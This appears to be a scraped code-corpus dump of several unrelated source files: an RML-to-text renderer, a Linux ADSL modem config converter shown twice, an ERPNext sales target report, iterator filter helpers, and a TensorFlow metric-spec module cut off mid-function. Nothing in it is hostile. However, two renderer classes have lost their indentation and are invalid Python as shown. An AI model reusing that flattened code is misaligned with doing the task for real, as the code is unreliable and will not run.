            self.lines.extend(self.curline.renderlines())
        else:
            self.lines.append(self.curline)
        self.curline = ''

    def fline(self):
        """Close the current line, but drop it if it is empty."""
        if isinstance(self.curline, textbox):
            self.lines.extend(self.curline.renderlines())
        elif len(self.curline):
            self.lines.append(self.curline)
        self.curline = ''

    def appendtxt(self, txt):
        """Append some text to the current line.

        Mimic the HTML behaviour, where all whitespace evaluates to
        a single space.
        """
        if not txt:
            return
        bs = txt[0].isspace()   # was txt[len(txt)-1] style; [-1] is idiomatic
        es = txt[-1].isspace()
        # Collapse boundary whitespace into a single separating space,
        # unless the previous chunk already ended with one.
        if bs and not self.endspace:
            self.curline += " "
        self.curline += txt.strip().replace("\n", " ").replace("\t", " ")
        if es:
            self.curline += " "
        self.endspace = es

    def rendertxt(self, xoffset=0):
        """Render the whole box to a single string, applying both offsets."""
        # " " * n replaces the original O(n) char-by-char append loops.
        lineoff = " " * (self.posx + xoffset)
        result = "\n" * self.posy
        for line in self.lines:
            result += lineoff + line + "\n"
        return result

    def renderlines(self, pad=0):
        """Returns a list of lines, from the current object.

        pad: all lines must be at least pad characters.
        """
        lineoff = " " * self.posx
        result = []
        for line in self.lines:
            # Right-pad short lines; longer lines are left untruncated.
            lpad = " " * (pad - len(line)) if pad and len(line) < pad else ""
            result.append(lineoff + line + lpad)
        return result

    def haplines(self, arr, offset, cc=''):
        """Horizontally append lines."""
        while len(self.lines) < len(arr):
            self.lines.append("")
        for i in range(len(self.lines)):
            # Pad every existing line out to the join column.
            self.lines[i] = self.lines[i].ljust(offset)
        for i in range(len(arr)):
            self.lines[i] += cc + arr[i]
class _flowable(object):
    """Walks RML 'story' nodes and renders them into textbox objects.

    Tag names prefixed with '1' in the dispatch table below can never match
    a real node tag, so those handlers are effectively disabled.
    """
    def __init__(self, template, doc,localcontext):
        # Dispatch table: RML tag name -> handler method.
        self._tags = {
            '1title': self._tag_title,
            '1spacer': self._tag_spacer,
            'para': self._tag_para,
            'font': self._tag_font,
            'section': self._tag_section,
            '1nextFrame': self._tag_next_frame,
            'blockTable': self._tag_table,
            '1pageBreak': self._tag_page_break,
            '1setNextTemplate': self._tag_next_template,
        }
        self.template = template
        self.doc = doc
        self.localcontext = localcontext
        self.nitags = []
        # NOTE(review): the rendering methods use self.tb (set in render and
        # _tag_table), not this attribute -- 'tbox' looks vestigial.
        self.tbox = None
    def warn_nitag(self,tag):
        """Log each not-implemented tag only once."""
        if tag not in self.nitags:
            verbose("Unknown tag \"%s\", please implement it." % tag)
            self.nitags.append(tag)
    def _tag_page_break(self, node):
        # Form feed starts a new page in plain-text output.
        return "\f"
    def _tag_next_template(self, node):
        return ''
    def _tag_next_frame(self, node):
        """Close the current frame and open the next one of the template."""
        result=self.template.frame_stop()
        result+='\n'
        result+=self.template.frame_start()
        return result
    def _tag_title(self, node):
        # NOTE(review): tagName/toxml are minidom APIs while nodes here come
        # from lxml.etree -- confirm this handler is actually reachable
        # (its tag key is '1title', which never matches).
        node.tagName='h1'
        return node.toxml()
    def _tag_spacer(self, node):
        # One blank line per ~35 units of requested spacer length.
        length = 1+int(utils.unit_get(node.get('length')))/35
        return "\n"*length
    def _tag_table(self, node):
        """Render a blockTable: each td into its own textbox, then join the
        cells of a row horizontally with haplines at colWidths offsets."""
        self.tb.fline()
        saved_tb = self.tb
        self.tb = None
        sizes = None
        if node.get('colWidths'):
            sizes = map(lambda x: utils.unit_get(x), node.get('colWidths').split(','))
        trs = []
        for n in utils._child_get(node,self):
            if n.tag == 'tr':
                tds = []
                for m in utils._child_get(n,self):
                    if m.tag == 'td':
                        self.tb = textbox()
                        self.rec_render_cnodes(m)
                        tds.append(self.tb)
                        self.tb = None
                if len(tds):
                    trs.append(tds)
        if not sizes:
            # NOTE(review): sizes stays None after this message, so the loop
            # below would raise on sizes[i] -- tables without colWidths
            # appear unsupported; confirm intended behaviour.
            verbose("computing table sizes..")
        for tds in trs:
            trt = textbox()
            off=0
            for i in range(len(tds)):
                # Column width in characters, derived from the font size.
                p = int(sizes[i]/Font_size)
                trl = tds[i].renderlines(pad=p)
                trt.haplines(trl,off)
                off += sizes[i]/Font_size
            saved_tb.curline = trt
            saved_tb.fline()
        self.tb = saved_tb
        return
    def _tag_para(self, node):
        #TODO: styles
        self.rec_render_cnodes(node)
        self.tb.newline()
    def _tag_section(self, node):
        #TODO: styles
        self.rec_render_cnodes(node)
        self.tb.newline()
    def _tag_font(self, node):
        """We do ignore fonts.."""
        self.rec_render_cnodes(node)
    def rec_render_cnodes(self,node):
        """Append the node's text, render its children, then its tail text."""
        self.tb.appendtxt(utils._process_text(self, node.text or ''))
        for n in utils._child_get(node,self):
            self.rec_render(n)
        self.tb.appendtxt(utils._process_text(self, node.tail or ''))
    def rec_render(self,node):
        """ Recursive render: fill outarr with text of current node
        """
        if node.tag is not None:
            if node.tag in self._tags:
                self._tags[node.tag](node)
            else:
                self.warn_nitag(node.tag)
    def render(self, node):
        """Render *node*'s children into a fresh textbox; return the text."""
        self.tb= textbox()
        #result = self.template.start()
        #result += self.template.frame_start()
        self.rec_render_cnodes(node)
        #result += self.template.frame_stop()
        #result += self.template.end()
        result = self.tb.rendertxt()
        del self.tb
        return result
class _rml_tmpl_tag(object):
def __init__(self, *args):
pass
def tag_start(self):
return ''
def tag_end(self):
return False
def tag_stop(self):
return ''
def tag_mergeable(self):
return True
class _rml_tmpl_frame(_rml_tmpl_tag):
    """A frame region of the page template: positioned, not mergeable."""

    def __init__(self, posx, width):
        self.posx = posx
        self.width = width

    def tag_start(self):
        return "frame start"

    def tag_end(self):
        # Frames stay open until an explicit frame_stop.
        return True

    def tag_stop(self):
        return "frame stop"

    def tag_mergeable(self):
        return False

    # An awfull workaround since I don't really understand the semantic
    # behind merge.
    def merge(self, frame):
        pass
class _rml_tmpl_draw_string(_rml_tmpl_tag):
    """A drawString / drawRightString / drawCentredString graphics element.

    NOTE(review): uses ``node.localName`` (a minidom-style attribute) while
    the rest of the file parses with lxml.etree -- confirm which node type
    is actually passed here.
    """
    def __init__(self, node, style):
        self.posx = utils.unit_get(node.get('x'))
        self.posy = utils.unit_get(node.get('y'))
        aligns = {
            'drawString': 'left',
            'drawRightString': 'right',
            'drawCentredString': 'center'
        }
        align = aligns[node.localName]
        # Each entry: (x, y, alignment, text, style string, font size).
        self.pos = [(self.posx, self.posy, align, utils.text_get(node), style.get('td'), style.font_size_get('td'))]
    def tag_start(self):
        # NOTE(review): emits the placeholder "txt" rather than the stored
        # string -- presumably debug output; verify before relying on it.
        return "draw string \"%s\" @(%d,%d)..\n" %("txt",self.posx,self.posy)
    def merge(self, ds):
        # Accumulate the positions of strings merged onto the same row.
        self.pos+=ds.pos
class _rml_tmpl_draw_lines(_rml_tmpl_tag):
    """A <lines> page-graphics element; only horizontal lines are 'ok'."""
    def __init__(self, node, style):
        # Node text is "x1 y1 x2 y2" in RML units.
        coord = [utils.unit_get(x) for x in utils.text_get(node).split(' ')]
        self.ok = False
        self.posx = coord[0]
        self.posy = coord[1]
        self.width = coord[2]-coord[0]
        # Renderable only when horizontal (equal y endpoints).
        self.ok = coord[1]==coord[3]
        self.style = style
        # NOTE(review): the style object is immediately replaced by the 'hr'
        # style *string* -- confirm whether keeping both was intended.
        self.style = style.get('hr')
    def tag_start(self):
        return "draw lines..\n"
class _rml_stylesheet(object):
    """Converts RML paraStyle declarations into a CSS-like string.

    NOTE(review): iterates ``ps.attributes`` / ``attrs.item(i).localName``
    (minidom API) although the document is parsed with lxml.etree; this
    path looks unused/dead -- verify before relying on it.
    """
    def __init__(self, stylesheet, doc):
        self.doc = doc
        self.attrs = {}
        # Supported paraStyle attributes -> (css-property, css-value) pairs.
        self._tags = {
            'fontSize': lambda x: ('font-size',str(utils.unit_get(x))+'px'),
            'alignment': lambda x: ('text-align',str(x))
        }
        result = ''
        for ps in stylesheet.findall('paraStyle'):
            attr = {}
            attrs = ps.attributes
            for i in range(attrs.length):
                name = attrs.item(i).localName
                attr[name] = ps.get(name)
            attrs = []
            for a in attr:
                if a in self._tags:
                    attrs.append("%s:%s" % self._tags[a](attr[a]))
            if len(attrs):
                # Emit a CSS rule for paragraphs of this style name.
                result += "p."+attr['name']+" {"+'; '.join(attrs)+"}\n"
        self.result = result
    def render(self):
        # Plain-text output carries no styles.
        return ''
class _rml_draw_style(object):
def __init__(self):
self.style = {}
self._styles = {
'fill': lambda x: {'td': {'color':x.get('color')}},
'setFont': lambda x: {'td': {'font-size':x.get('size')+'px'}},
'stroke': lambda x: {'hr': {'color':x.get('color')}},
}
def update(self, node):
if node.localName in self._styles:
result = self._styles[node.localName](node)
for key in result:
if key in self.style:
self.style[key].update(result[key])
else:
self.style[key] = result[key]
def font_size_get(self,tag):
size = utils.unit_get(self.style.get('td', {}).get('font-size','16'))
return size
def get(self,tag):
if not tag in self.style:
return ""
return ';'.join(['%s:%s' % (x[0],x[1]) for x in self.style[tag].items()])
class _rml_template(object):
    """Collects page templates, frames and page graphics from the RML
    <template> node and exposes frame start/stop rendering for text output."""

    def __init__(self, localcontext, out, node, doc, images=None, path='.', title=None):
        self.localcontext = localcontext
        self.frame_pos = -1
        self.frames = []
        self.template_order = []   # template ids in document order
        self.page_template = {}    # id -> ordered list of template tags
        self.loop = 0              # set to 1 when frame_start wraps around
        self._tags = {
            'drawString': _rml_tmpl_draw_string,
            'drawRightString': _rml_tmpl_draw_string,
            'drawCentredString': _rml_tmpl_draw_string,
            'lines': _rml_tmpl_draw_lines
        }
        self.style = _rml_draw_style()
        for pt in node.findall('pageTemplate'):
            frames = {}
            id = pt.get('id')
            self.template_order.append(id)
            for tmpl in pt.findall('frame'):
                posy = int(utils.unit_get(tmpl.get('y1')))  #+utils.unit_get(tmpl.get('height'))
                posx = int(utils.unit_get(tmpl.get('x1')))
                frames[(posy, posx, tmpl.get('id'))] = _rml_tmpl_frame(posx, utils.unit_get(tmpl.get('width')))
            # NOTE(review): scans the whole <template> node (not just pt) for
            # pageGraphics on every iteration -- presumably shared graphics.
            for tmpl in node.findall('pageGraphics'):
                for n in tmpl.getchildren():
                    if n.nodeType == n.ELEMENT_NODE:
                        if n.localName in self._tags:
                            t = self._tags[n.localName](n, self.style)
                            frames[(t.posy, t.posx, n.localName)] = t
                        else:
                            self.style.update(n)
            # Sort frames top-most first, merging consecutive mergeable tags
            # that share the same vertical position.  sorted(..., reverse=True)
            # replaces the Python-2-only keys.sort()/keys.reverse() dance.
            keys = sorted(frames.keys(), reverse=True)
            self.page_template[id] = []
            for key in range(len(keys)):
                if key > 0 and keys[key-1][0] == keys[key][0]:
                    if type(self.page_template[id][-1]) == type(frames[keys[key]]):
                        if self.page_template[id][-1].tag_mergeable():
                            self.page_template[id][-1].merge(frames[keys[key]])
                            continue
                self.page_template[id].append(frames[keys[key]])
        self.template = self.template_order[0]

    def _get_style(self):
        return self.style

    def set_next_template(self):
        """Advance to the next page template in document order (wrapping).

        Bug fix: the original referenced an undefined name ``name`` and took
        the modulo of the list object itself (a TypeError at runtime); we
        advance from the currently active template instead.
        """
        current = self.template_order.index(self.template)
        self.template = self.template_order[(current + 1) % len(self.template_order)]
        self.frame_pos = -1

    def set_template(self, name):
        """Activate the template called *name* and reset the frame cursor."""
        self.template = name
        self.frame_pos = -1

    def frame_start(self):
        """Emit start text for the next frame of the active page template."""
        result = ''
        frames = self.page_template[self.template]
        ok = True
        while ok:
            self.frame_pos += 1
            if self.frame_pos >= len(frames):
                # Ran past the last frame: wrap around and flag a new loop.
                self.frame_pos = 0
                self.loop = 1
                ok = False
                continue
            f = frames[self.frame_pos]
            result += f.tag_start()
            ok = not f.tag_end()
            if ok:
                # Tag needs no explicit end: close it and keep scanning.
                result += f.tag_stop()
        return result

    def frame_stop(self):
        """Emit stop text for the frame the cursor currently points at."""
        frames = self.page_template[self.template]
        f = frames[self.frame_pos]
        result = f.tag_stop()
        return result

    def start(self):
        return ''

    def end(self):
        return "template end\n"
class _rml_doc(object):
    """Top-level driver: holds the parsed RML tree and renders each story."""
    def __init__(self, node, localcontext=None, images=None, path='.', title=None):
        self.localcontext = {} if localcontext is None else localcontext
        self.etree = node
        self.filename = self.etree.get('filename')
        self.result = ''
    def render(self, out):
        """Render every <story> using the first <template>; write to *out*."""
        #el = self.etree.findall('docinit')
        #if el:
        #self.docinit(el)
        #el = self.etree.findall('stylesheet')
        #self.styles = _rml_styles(el,self.localcontext)
        el = self.etree.findall('template')
        self.result =""
        if len(el):
            pt_obj = _rml_template(self.localcontext, out, el[0], self)
            stories = utils._child_get(self.etree, self, 'story')
            for story in stories:
                if self.result:
                    # Form feed between consecutive stories.
                    self.result += '\f'
                f = _flowable(pt_obj,story,self.localcontext)
                self.result += f.render(story)
                del f
        else:
            self.result = "<cannot render w/o template>"
        self.result += '\n'
        out.write( self.result)
def parseNode(rml, localcontext=None, fout=None, images=None, path='.', title=None):
    """Render an RML string to plain text and return it."""
    root = etree.XML(rml)
    doc = _rml_doc(root, localcontext, images, path, title=title)
    buf = StringIO.StringIO()
    doc.render(buf)
    return buf.getvalue()
def parseString(rml, localcontext=None, fout=None, images=None, path='.', title=None):
    """Render an RML string to text; write to *fout* if given, else return it."""
    root = etree.XML(rml)
    doc = _rml_doc(root, localcontext, images, path, title=title)
    if not fout:
        buf = StringIO.StringIO()
        doc.render(buf)
        return buf.getvalue()
    fp = file(fout, 'wb')  # Python 2 builtin, matching the rest of the file
    doc.render(fp)
    fp.close()
    return fout
def trml2pdf_help():
    # Print CLI usage and exit successfully (Python 2 print statements).
    print 'Usage: rml2txt input.rml >output.html'
    print 'Render the standard input (RML) and output an TXT file'
    sys.exit(0)
if __name__=="__main__":
    # CLI entry point: render the RML file given as argv[1] (output encoded
    # as ISO-8859-7, i.e. Greek), or show usage when no file is given.
    if len(sys.argv)>1:
        if sys.argv[1]=='--help':
            trml2pdf_help()
        print parseString(file(sys.argv[1], 'r').read()).encode('iso8859-7')
    else:
        print 'Usage: trml2txt input.rml >output.pdf'
        print 'Try \'trml2txt --help\' for more information.'
| agpl-3.0 |
dadcup18/cm11_kernel_samsung_codinalte | Documentation/networking/cxacru-cf.py | 14668 | 1626 | #!/usr/bin/env python
# Copyright 2009 Simon Arlott
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Usage: cxacru-cf.py < cxacru-cf.bin
# Output: values string suitable for the sysfs adsl_config attribute
#
# Warning: cxacru-cf.bin with MD5 hash cdbac2689969d5ed5d4850f117702110
# contains mis-aligned values which will stop the modem from being able
# to make a connection. If the first and last two bytes are removed then
# the values become valid, but the modulation will be forced to ANSI
# T1.413 only which may not be appropriate.
#
# The original binary format is a packed list of le32 values.
import sys
import struct
# Read packed little-endian u32 values from stdin and emit them as one line
# of space-separated "<index-in-hex>=<value>" pairs for the adsl_config
# sysfs attribute.
i = 0
while True:
	buf = sys.stdin.read(4)
	if len(buf) == 0:
		# Clean EOF on a 4-byte boundary: done.
		break
	elif len(buf) != 4:
		# Trailing partial value: terminate the output line and report.
		sys.stdout.write("\n")
		sys.stderr.write("Error: read {0} not 4 bytes\n".format(len(buf)))
		sys.exit(1)
	if i > 0:
		sys.stdout.write(" ")
	sys.stdout.write("{0:x}={1}".format(i, struct.unpack("<I", buf)[0]))
	i += 1
sys.stdout.write("\n")
elba7r/lite-system | erpnext/selling/report/sales_person_target_variance_item_group_wise/sales_person_target_variance_item_group_wise.py | 16 | 6236 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, msgprint
from frappe.utils import flt
from erpnext.accounts.utils import get_fiscal_year
from erpnext.controllers.trends import get_period_date_ranges, get_period_month_ranges
def execute(filters=None):
	"""Report entry point.

	Returns (columns, rows) where each row is
	[sales_person, item_group, <target, achieved, variance per period>...,
	total_target, total_achieved, total_variance].
	"""
	if not filters: filters = {}
	columns = get_columns(filters)
	period_month_ranges = get_period_month_ranges(filters["period"], filters["fiscal_year"])
	sim_map = get_salesperson_item_month_map(filters)
	data = []
	for salesperson, salesperson_items in sim_map.items():
		for item_group, monthwise_data in salesperson_items.items():
			row = [salesperson, item_group]
			totals = [0, 0, 0]  # running [target, achieved, variance]
			for relevant_months in period_month_ranges:
				period_data = [0, 0, 0]
				for month in relevant_months:
					month_data = monthwise_data.get(month, {})
					for i, fieldname in enumerate(["target", "achieved", "variance"]):
						value = flt(month_data.get(fieldname))
						period_data[i] += value
						totals[i] += value
				# Period variance is recomputed from the period's own totals.
				period_data[2] = period_data[0] - period_data[1]
				row += period_data
			# Grand-total variance likewise overrides the accumulated value.
			totals[2] = totals[0] - totals[1]
			row += totals
			data.append(row)
	return columns, sorted(data, key=lambda x: (x[0], x[1]))
def get_columns(filters):
	"""Build the report column definitions; validates required filters."""
	for fieldname in ["fiscal_year", "period", "target_on"]:
		if not filters.get(fieldname):
			label = (" ".join(fieldname.split("_"))).title()
			msgprint(_("Please specify") + ": " + label,
				raise_exception=True)
	columns = [_("Sales Person") + ":Link/Sales Person:120", _("Item Group") + ":Link/Item Group:120"]
	# Non-monthly periods label columns with a month range, e.g. "Jan - Mar".
	group_months = False if filters["period"] == "Monthly" else True
	for from_date, to_date in get_period_date_ranges(filters["period"], filters["fiscal_year"]):
		for label in [_("Target") + " (%s)", _("Achieved") + " (%s)", _("Variance") + " (%s)"]:
			if group_months:
				label = label % (_(from_date.strftime("%b")) + " - " + _(to_date.strftime("%b")))
			else:
				label = label % _(from_date.strftime("%b"))
			columns.append(label+":Float:120")
	return columns + [_("Total Target") + ":Float:120", _("Total Achieved") + ":Float:120",
		_("Total Variance") + ":Float:120"]
#Get sales person & item group details
def get_salesperson_details(filters):
	"""Return one row per (sales person, target detail) for the fiscal year:
	name, item_group, target_qty, target_amount, distribution_id."""
	return frappe.db.sql("""
		select
			sp.name, td.item_group, td.target_qty, td.target_amount, sp.distribution_id
		from
			`tabSales Person` sp, `tabTarget Detail` td
		where
			td.parent=sp.name and td.fiscal_year=%s order by sp.name
		""", (filters["fiscal_year"]), as_dict=1)
#Get target distribution details of item group
def get_target_distribution_details(filters):
	"""Return {distribution_name: {month_name: percentage_allocation}} for
	all monthly distributions of the selected fiscal year."""
	rows = frappe.db.sql("""
		select
			md.name, mdp.month, mdp.percentage_allocation
		from
			`tabMonthly Distribution Percentage` mdp, `tabMonthly Distribution` md
		where
			mdp.parent=md.name and md.fiscal_year=%s
		""", (filters["fiscal_year"]), as_dict=1)
	target_details = {}
	for row in rows:
		target_details.setdefault(row.name, {}).setdefault(row.month, flt(row.percentage_allocation))
	return target_details
#Get achieved details from sales order
def get_achieved_details(filters, sales_person, all_sales_persons, target_item_group, item_groups):
	"""Return {month_name: {quantity, amount}} achieved by *sales_person*
	(including its sub-tree via lft/rgt) for *target_item_group* and its
	descendants, from submitted Sales Orders in the fiscal year, weighted
	by the sales-team allocation percentage."""
	start_date, end_date = get_fiscal_year(fiscal_year = filters["fiscal_year"])[1:]
	item_details = frappe.db.sql("""
		select
			sum(soi.qty * (st.allocated_percentage/100)) as qty,
			sum(soi.base_net_amount * (st.allocated_percentage/100)) as amount,
			st.sales_person, MONTHNAME(so.transaction_date) as month_name
		from
			`tabSales Order Item` soi, `tabSales Order` so, `tabSales Team` st
		where
			soi.parent=so.name and so.docstatus=1 and st.parent=so.name
			and so.transaction_date>=%s and so.transaction_date<=%s
			and exists(select name from `tabSales Person` where lft >= %s and rgt <= %s and name=st.sales_person)
			and exists(select name from `tabItem Group` where lft >= %s and rgt <= %s and name=soi.item_group)
		group by
			sales_person, month_name
		""",
		(start_date, end_date, all_sales_persons[sales_person].lft, all_sales_persons[sales_person].rgt,
		item_groups[target_item_group].lft, item_groups[target_item_group].rgt), as_dict=1)
	actual_details = {}
	for d in item_details:
		# Accumulate per-month totals across all matching sales persons.
		actual_details.setdefault(d.month_name, frappe._dict({
			"quantity" : 0,
			"amount" : 0
		}))
		value_dict = actual_details[d.month_name]
		value_dict.quantity += flt(d.qty)
		value_dict.amount += flt(d.amount)
	return actual_details
def get_salesperson_item_month_map(filters):
	"""Build {sales_person: {item_group: {month_name: {target, achieved}}}}.

	Targets are spread over months using the salesperson's monthly
	distribution (or evenly, 100/12, when none is set); achieved figures
	come from submitted Sales Orders via get_achieved_details.
	"""
	import datetime
	salesperson_details = get_salesperson_details(filters)
	tdd = get_target_distribution_details(filters)
	item_groups = get_item_groups()
	sales_persons = get_sales_persons()
	sales_person_achievement_dict = {}
	for sd in salesperson_details:
		achieved_details = get_achieved_details(filters, sd.name, sales_persons, sd.item_group, item_groups)
		for month_id in range(1, 13):
			# Any non-leap year works; only the month name is used.
			month = datetime.date(2013, month_id, 1).strftime('%B')
			sales_person_achievement_dict.setdefault(sd.name, {}).setdefault(sd.item_group, {})\
				.setdefault(month, frappe._dict({
					"target": 0.0, "achieved": 0.0
				}))
			sales_target_achieved = sales_person_achievement_dict[sd.name][sd.item_group][month]
			month_percentage = tdd.get(sd.distribution_id, {}).get(month, 0) \
				if sd.distribution_id else 100.0/12
			if (filters["target_on"] == "Quantity"):
				sales_target_achieved.target = flt(sd.target_qty) * month_percentage / 100
			else:
				sales_target_achieved.target = flt(sd.target_amount) * month_percentage / 100
			# target_on is "Quantity"/"Amount"; achieved keys are lower-case.
			sales_target_achieved.achieved = achieved_details.get(month, frappe._dict())\
				.get(filters["target_on"].lower())
	return sales_person_achievement_dict
def get_item_groups():
	"""Return {item_group_name: {'lft': ..., 'rgt': ...}} for all item groups."""
	out = frappe._dict()
	for row in frappe.get_all("Item Group", fields=["name", "lft", "rgt"]):
		out.setdefault(row.name, frappe._dict({
			"lft": row.lft,
			"rgt": row.rgt
		}))
	return out
def get_sales_persons():
	"""Return {sales_person_name: {'lft': ..., 'rgt': ...}} for all sales persons."""
	out = frappe._dict()
	for row in frappe.get_all("Sales Person", fields=["name", "lft", "rgt"]):
		out.setdefault(row.name, frappe._dict({
			"lft": row.lft,
			"rgt": row.rgt
		}))
	return out
| gpl-3.0 |
def limit(iterator, count):
    """
    A filter that removes all elements behind the set limit.

    :param iterator: The iterator to be filtered.
    :param count:    The iterator limit. All elements at positions bigger
                     than this limit are trimmed off. Exclusion: 0 or
                     numbers below do not limit at all, means the passed
                     iterator is completely yielded.
    """
    from itertools import islice
    if count <= 0:  # Performance branch: no limiting at all.
        yield from iterator
    else:
        # islice yields exactly `count` elements and, like the original
        # hand-rolled loop, consumes nothing beyond them.
        yield from islice(iterator, count)
def trim_empty_matches(iterator, groups=(0,)):
    """
    A filter that removes empty match strings. It can only operate on
    iterators whose elements are of type MatchObject.

    :param iterator: The iterator to be filtered.
    :param groups:   An iterable defining the groups to check for blankness.
                     Only results are not yielded if all groups of the match
                     are blank.
                     You can not only pass numbers but also strings, if your
                     MatchObject contains named groups.
    """
    for match in iterator:
        has_content = False
        for group in groups:
            if len(match.group(group)) > 0:
                has_content = True
                break
        if has_content:
            yield match
Where-No-Man-Has-Gone-Before/OWL-Predator-KERNEL_BAK | Documentation/networking/cxacru-cf.py | 14668 | 1626 | #!/usr/bin/env python
# Copyright 2009 Simon Arlott
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Usage: cxacru-cf.py < cxacru-cf.bin
# Output: values string suitable for the sysfs adsl_config attribute
#
# Warning: cxacru-cf.bin with MD5 hash cdbac2689969d5ed5d4850f117702110
# contains mis-aligned values which will stop the modem from being able
# to make a connection. If the first and last two bytes are removed then
# the values become valid, but the modulation will be forced to ANSI
# T1.413 only which may not be appropriate.
#
# The original binary format is a packed list of le32 values.
import sys
import struct
# Read packed little-endian u32 values from stdin and emit them as one line
# of space-separated "<index-in-hex>=<value>" pairs for the adsl_config
# sysfs attribute.
i = 0
while True:
	buf = sys.stdin.read(4)
	if len(buf) == 0:
		# Clean EOF on a 4-byte boundary: done.
		break
	elif len(buf) != 4:
		# Trailing partial value: terminate the output line and report.
		sys.stdout.write("\n")
		sys.stderr.write("Error: read {0} not 4 bytes\n".format(len(buf)))
		sys.exit(1)
	if i > 0:
		sys.stdout.write(" ")
	sys.stdout.write("{0:x}={1}".format(i, struct.unpack("<I", buf)[0]))
	i += 1
sys.stdout.write("\n")
llhe/tensorflow | tensorflow/contrib/learn/python/learn/metric_spec.py | 16 | 16381 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The metric spec class to flexibly connect models and metrics."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import tf_inspect
def _assert_named_args(sentinel):
if sentinel is not None:
raise ValueError(
'`metric_fn` requires named args: '
'`labels`, `predictions`, and optionally `weights`.')
def _args(fn):
  """Get argument names for function-like object.

  Args:
    fn: Function, or function-like object (e.g., result of `functools.partial`).

  Returns:
    `tuple` of string argument names.
  """
  if hasattr(fn, 'func') and hasattr(fn, 'keywords'):
    # functools.partial-like object: report only the args not already
    # bound by keyword.
    bound = set(fn.keywords.keys())
    return tuple(
        arg for arg in tf_inspect.getargspec(fn.func).args if arg not in bound)
  return tuple(tf_inspect.getargspec(fn).args)
# Recognized aliases for each canonical metric_fn argument name.  A metric
# function may use any one alias from a set; _matching_arg maps whichever
# alias appears back to the canonical role (labels/predictions/weights).
_CANONICAL_LABELS_ARG = 'labels'
_LABELS_ARGS = set((_CANONICAL_LABELS_ARG, 'label', 'targets', 'target'))
_CANONICAL_PREDICTIONS_ARG = 'predictions'
_PREDICTIONS_ARGS = set((_CANONICAL_PREDICTIONS_ARG, 'prediction',
                         'logits', 'logit'))
_CANONICAL_WEIGHTS_ARG = 'weights'
_WEIGHTS_ARGS = set((_CANONICAL_WEIGHTS_ARG, 'weight'))
def _matching_arg(
fn_name, fn_args, candidate_args, canonical_arg, is_required=False):
"""Find single argument in `args` from `candidate_args`.
Args:
fn_name: Function name, only used for error string.
fn_args: String argument names to `fn_name` function.
candidate_args: Candidate argument names to find in `args`.
canonical_arg: Canonical argument name in `candidate_args`. This is only
used to log a warning if a non-canonical match is found.
is_required: Whether function is required to have an arg in
`candidate_args`.
Returns:
String argument name if found, or `None` if not found.
Raises:
ValueError: if 2 candidates are found, or 0 are found and `is_required` is
set.
"""
assert canonical_arg in candidate_args # Sanity check.
matching_args = candidate_args.intersection(fn_args)
if len(matching_args) > 1:
raise ValueError(
'Ambiguous arguments %s, must provide only one of %s.' % (
matching_args, candidate_args))
matching_arg = matching_args.pop() if matching_args else None
if matching_arg:
if matching_arg != canonical_arg:
logging.warning(
'Canonical arg %s missing from %s(%s), using %s.',
canonical_arg, fn_name, fn_args, matching_arg)
elif is_required:
raise ValueError(
'%s missing from %s(%s).' % (candidate_args, fn_name, fn_args))
return matching_arg
def _fn_name(fn):
if hasattr(fn, '__name__'):
return fn.__name__
if hasattr(fn, 'func') and hasattr(fn.func, '__name__'):
return fn.func.__name__ # If it's a functools.partial.
return str(fn)
def _adapt_metric_fn(
    metric_fn, metric_fn_name, is_labels_required, is_weights_required):
  """Adapt `metric_fn` to take only named args.

  This returns a function that takes only named args `labels`, `predictions`,
  and `weights`, and invokes `metric_fn` according to the following rules:
  - If `metric_fn` args include exactly one of `_LABELS_ARGS`, that arg is
    passed (usually by name, but positionally if both it and `predictions` need
    to be passed positionally). Otherwise, `labels` are omitted.
  - If `metric_fn` args include exactly one of `_PREDICTIONS_ARGS`, that arg is
    passed by name. Otherwise, `predictions` are passed positionally as the
    first non-label argument.
  - If exactly one of `_WEIGHTS_ARGS` is provided, that arg is passed by
    name.

  Args:
    metric_fn: Metric function to be wrapped.
    metric_fn_name: `metric_fn` name, only used for logging.
    is_labels_required: Whether `labels` is a required arg.
    is_weights_required: Whether `weights` is a required arg.

  Returns:
    Function accepting only named args `labels, `predictions`, and `weights`,
    and passing those to `metric_fn`.

  Raises:
    ValueError: if one of the following is true:
    - `metric_fn` has more than one arg of `_LABELS_ARGS`, `_PREDICTIONS_ARGS`,
      or `_WEIGHTS_ARGS`
    - `is_labels_required` is true, and `metric_fn` has no arg from
      `_LABELS_ARGS`.
    - `is_weights_required` is true, and `metric_fn` has no arg from
      `_WEIGHTS_ARGS`.
  """
  # Resolve which alias (if any) metric_fn uses for each canonical role.
  args = _args(metric_fn)
  labels_arg = _matching_arg(
      metric_fn_name, args, _LABELS_ARGS, _CANONICAL_LABELS_ARG,
      is_labels_required)
  predictions_arg = _matching_arg(
      metric_fn_name, args, _PREDICTIONS_ARGS, _CANONICAL_PREDICTIONS_ARG)
  weights_arg = _matching_arg(
